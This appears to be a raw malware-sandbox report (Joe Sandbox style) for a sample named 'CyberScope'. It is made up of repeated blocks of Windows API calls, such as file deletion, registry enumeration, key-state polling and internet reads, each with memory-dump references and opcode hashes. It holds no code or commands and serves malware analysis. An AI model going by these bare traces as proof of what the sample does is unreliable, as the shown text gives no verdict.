                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,001D5657,?,?,001962FA,?,00000001,?,?,00000000), ref: 00196610
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00196622
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,001D5657,?,?,001962FA,?,00000001,?,?,00000000), ref: 00196635
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 145871493-1355242751
                                                                                    • Opcode ID: 2892907a4d2708c1e8b217e309708d5713e3217e0216706802f0bbbaf31023a3
                                                                                    • Instruction ID: 434d99602c9699c489979d64f110409a92844bab38d15201d6b3ce5f8d5044e1
                                                                                    • Opcode Fuzzy Hash: 2892907a4d2708c1e8b217e309708d5713e3217e0216706802f0bbbaf31023a3
                                                                                    • Instruction Fuzzy Hash: 36D05B356125317747322B657C1CDCF6B149ED6F513050015FC04A2114DF64CD22C5F8
                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002035C4
                                                                                    • DeleteFileW.KERNEL32(?), ref: 00203646
                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0020365C
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0020366D
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0020367F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Delete$Copy
                                                                                    • String ID:
                                                                                    • API String ID: 3226157194-0
                                                                                    • Opcode ID: 47cb93d0467c4ea2a71392114f9095b30012e8a03d7ecbe10c16bcc41cd82ee1
                                                                                    • Instruction ID: 197ec8114546a5f78251cd1d495f46dbdebdd93880742a4a18f44f8e4de1db3f
                                                                                    • Opcode Fuzzy Hash: 47cb93d0467c4ea2a71392114f9095b30012e8a03d7ecbe10c16bcc41cd82ee1
                                                                                    • Instruction Fuzzy Hash: B8B15D72910219BBDF15DFA4CC85EDEBBBDEF19314F0040A6F609A6192EB309B558F60
                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0021AE87
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0021AE95
                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0021AEC8
                                                                                    • CloseHandle.KERNEL32(?), ref: 0021B09D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 3488606520-0
                                                                                    • Opcode ID: d2df9eed94798f554dd04a764353eb0e6922ccc10741b7691f0d99dcd0e97da3
                                                                                    • Instruction ID: d9415541da2faea91ad0483e955bab6040f5666d5406506368a5f51fb5adf108
                                                                                    • Opcode Fuzzy Hash: d2df9eed94798f554dd04a764353eb0e6922ccc10741b7691f0d99dcd0e97da3
                                                                                    • Instruction Fuzzy Hash: 58A1C175A04301AFE720DF24C886F2AB7E5AF68710F54885DF5999B2D2DB71EC41CB82
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                      • Part of subcall function 0021D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0021C10E,?,?), ref: 0021D415
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D451
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D4C8
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D4FE
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0021C505
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0021C560
                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0021C5C3
                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 0021C606
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0021C613
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                    • String ID:
                                                                                    • API String ID: 826366716-0
                                                                                    • Opcode ID: 69aa09f98146c593f39d5405dfb14a1558c08960c5c260c06df1a1a7520198b8
                                                                                    • Instruction ID: 946b0846effaecce4ac9b4c5758486acd965676460b9f492a1a12c2c71c9a746
                                                                                    • Opcode Fuzzy Hash: 69aa09f98146c593f39d5405dfb14a1558c08960c5c260c06df1a1a7520198b8
                                                                                    • Instruction Fuzzy Hash: FB61C235118241EFC714DF14C494E6ABBE5FF94308F64859CF0999B2A2CB31ED46CB91
                                                                                    APIs
                                                                                      • Part of subcall function 001FE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001FD7CD,?), ref: 001FE714
                                                                                      • Part of subcall function 001FE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001FD7CD,?), ref: 001FE72D
                                                                                      • Part of subcall function 001FEAB0: GetFileAttributesW.KERNEL32(?,001FD840), ref: 001FEAB1
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 001FED8A
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001FEDC3
                                                                                    • _wcslen.LIBCMT ref: 001FEF02
                                                                                    • _wcslen.LIBCMT ref: 001FEF1A
                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 001FEF67
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3183298772-0
                                                                                    • Opcode ID: 387c6b6a1e6510e3da5a71f1f3e3f1dae59ffed87242a5dbbfaf787690c0dd04
                                                                                    • Instruction ID: 478b4b632b72d5ae1eee7f651037ce94c372a3645890170fc3882e87e46faf9e
                                                                                    • Opcode Fuzzy Hash: 387c6b6a1e6510e3da5a71f1f3e3f1dae59ffed87242a5dbbfaf787690c0dd04
                                                                                    • Instruction Fuzzy Hash: 5E5152B24083899BC734EB94D8959EBB3ECEF94310F40092EF685D3161EF71A688C756
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 001F9534
                                                                                    • VariantClear.OLEAUT32 ref: 001F95A5
                                                                                    • VariantClear.OLEAUT32 ref: 001F9604
                                                                                    • VariantClear.OLEAUT32(?), ref: 001F9677
                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001F96A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                    • String ID:
                                                                                    • API String ID: 4136290138-0
                                                                                    • Opcode ID: 0032508c1d4d224cb1c019e8f772ac8a669de373a2aa839924bba2571800773d
                                                                                    • Instruction ID: 3d500ce464e7fccb66240d11e8e4809015a728481c76d74dbaa836b97a26c1f1
                                                                                    • Opcode Fuzzy Hash: 0032508c1d4d224cb1c019e8f772ac8a669de373a2aa839924bba2571800773d
                                                                                    • Instruction Fuzzy Hash: CC5146B5A00619EFCB14DF68D884EAAB7F9FF88314B158559EA09DB310E730E911CF90
                                                                                    APIs
                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002095F3
                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0020961F
                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00209677
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0020969C
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002096A4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                    • String ID:
                                                                                    • API String ID: 2832842796-0
                                                                                    • Opcode ID: cf7cc4cb43d101259f14bbdc80d6295679d074e52288b77678905c4bc6dc9eaf
                                                                                    • Instruction ID: 7c0ca7641e63c960da32bb9d87bad428ca57b30ad43ff14b24d5ed3699a67b98
                                                                                    • Opcode Fuzzy Hash: cf7cc4cb43d101259f14bbdc80d6295679d074e52288b77678905c4bc6dc9eaf
                                                                                    • Instruction Fuzzy Hash: 56516B35A00215EFCF15DF65C890AAABBF5FF59314F048058E84AAB3A2CB31ED51CB90
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0021999D
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00219A2D
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00219A49
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00219A8F
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00219AAF
                                                                                      • Part of subcall function 001AF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00201A02,?,7529E610), ref: 001AF9F1
                                                                                      • Part of subcall function 001AF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,001F0354,00000000,00000000,?,?,00201A02,?,7529E610,?,001F0354), ref: 001AFA18
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                    • String ID:
                                                                                    • API String ID: 666041331-0
                                                                                    • Opcode ID: d30b0b17184d98c212a573378c10f9f6fc890b5675ea6f50476e4e6310d9a8c8
                                                                                    • Instruction ID: 8afd8e8dda81fa1650098faac77ab2fc06caaa2b91274e590307e02b1baa6ef6
                                                                                    • Opcode Fuzzy Hash: d30b0b17184d98c212a573378c10f9f6fc890b5675ea6f50476e4e6310d9a8c8
                                                                                    • Instruction Fuzzy Hash: AD514935604206DFCB11DF68C4949E9BBF1FF29318B1480A9E84A9B762D731EDC6CB91
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0022766B
                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00227682
                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 002276AB
                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0020B5BE,00000000,00000000), ref: 002276D0
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 002276FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                    • String ID:
                                                                                    • API String ID: 3688381893-0
                                                                                    • Opcode ID: 6aa93d6be9111d5cf10ae97d23d4a5502753059dd5528b0a27d9f12f18c738ad
                                                                                    • Instruction ID: ac838c7c841fbfa604cb93bb3e7d61669f3fc897b98baa6135afa22307a5786e
                                                                                    • Opcode Fuzzy Hash: 6aa93d6be9111d5cf10ae97d23d4a5502753059dd5528b0a27d9f12f18c738ad
                                                                                    • Instruction Fuzzy Hash: 7F41E235A2C525BFC7248FACEC48FB57BA9EB49350F150224F819A72E0C7B0AD21CA50
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 1480c8d12930e1069452ac5cb6dad7cd24b5d62b099861e946f2eba60ea32502
                                                                                    • Instruction ID: d22bdf978903eb1f9356c6b0c74605c0be7847748f4fca0fc2ff8d11a23f66be
                                                                                    • Opcode Fuzzy Hash: 1480c8d12930e1069452ac5cb6dad7cd24b5d62b099861e946f2eba60ea32502
                                                                                    • Instruction Fuzzy Hash: CE419D32A002009BDB28DFB8C881F6EB7B5EFA9714B1545ADE515EB291DB31ED018B80
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 001919E1
                                                                                    • ScreenToClient.USER32(00000000,?), ref: 001919FE
                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00191A23
                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00191A3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                    • String ID:
                                                                                    • API String ID: 4210589936-0
                                                                                    • Opcode ID: a40513006b27f5760cf09069d22b9a2e63e42523b5e97eb1b2ab38baa511f328
                                                                                    • Instruction ID: d4a039710ce9fce043672d29e4ccd263431da917681f7ed11e9eb883f8f82b7a
                                                                                    • Opcode Fuzzy Hash: a40513006b27f5760cf09069d22b9a2e63e42523b5e97eb1b2ab38baa511f328
                                                                                    • Instruction Fuzzy Hash: 86415C71A0425BBEDF199FA4D844AEEB775FB05324F20821AE429A3290C7746E94CB52
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 001F2262
                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 001F230E
                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 001F2316
                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 001F2327
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001F232F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3382505437-0
                                                                                    • Opcode ID: 147dfd3f65e88f465d63bb94920823e18de07d3e6f333864c273b264c360bf46
                                                                                    • Instruction ID: 8ab206e9735daa3460eaed4769786bf72c819e80ceb41dbf8a2e53ec481a0d63
                                                                                    • Opcode Fuzzy Hash: 147dfd3f65e88f465d63bb94920823e18de07d3e6f333864c273b264c360bf46
                                                                                    • Instruction Fuzzy Hash: 91319F7290021DEFDB14CFA8DD89AEE3BB5EB14315F104229FA25AB2D0C770A954DB91
                                                                                    APIs
                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0020CC63,00000000), ref: 0020D97D
                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 0020D9B4
                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,0020CC63,00000000), ref: 0020D9F9
                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,0020CC63,00000000), ref: 0020DA0D
                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,0020CC63,00000000), ref: 0020DA37
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                    • String ID:
                                                                                    • API String ID: 3191363074-0
                                                                                    • Opcode ID: 06c456232f9c64f8711e92dd651f72cefae4da5fd11882e115d3af7405755060
                                                                                    • Instruction ID: 0994d3875260e2df37125e5c46683ddad2eaa79453d303baff3e18b4a10011d0
                                                                                    • Opcode Fuzzy Hash: 06c456232f9c64f8711e92dd651f72cefae4da5fd11882e115d3af7405755060
                                                                                    • Instruction Fuzzy Hash: 07317C71625309FFDB24DFE9D884AABB7F8EF14350B10442EE546D2192D730EE519B60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002261E4
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0022623C
                                                                                    • _wcslen.LIBCMT ref: 0022624E
                                                                                    • _wcslen.LIBCMT ref: 00226259
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002262B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 763830540-0
                                                                                    • Opcode ID: 837c1aee21af1a82b66e54cfb64669fea3d76c7d5e1e13f242bde64d435acfdb
                                                                                    • Instruction ID: 5e87b301ca762eddc24ce32846420c4b341fc55103fdd03d29aada39839cebd9
                                                                                    • Opcode Fuzzy Hash: 837c1aee21af1a82b66e54cfb64669fea3d76c7d5e1e13f242bde64d435acfdb
                                                                                    • Instruction Fuzzy Hash: 70219531920269BADB20DFD0EC88ADEB778FF45710F108256F915EA180D7749595CF50
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 002113AE
                                                                                    • GetForegroundWindow.USER32 ref: 002113C5
                                                                                    • GetDC.USER32(00000000), ref: 00211401
                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 0021140D
                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00211445
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                    • String ID:
                                                                                    • API String ID: 4156661090-0
                                                                                    • Opcode ID: 0e5cdfc16d62a68de487091a7928299337a86812e9fefb6b386e941dcddfae1c
                                                                                    • Instruction ID: 5fe7760f58ace53dfdf1f60508c047ca4e396c206ecabece777a77ed1db71fbe
                                                                                    • Opcode Fuzzy Hash: 0e5cdfc16d62a68de487091a7928299337a86812e9fefb6b386e941dcddfae1c
                                                                                    • Instruction Fuzzy Hash: DF218E36600204EFDB14EFA5D888AAEB7F9EF58300B048469E85A97791CB30AC55CF90
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 001CD146
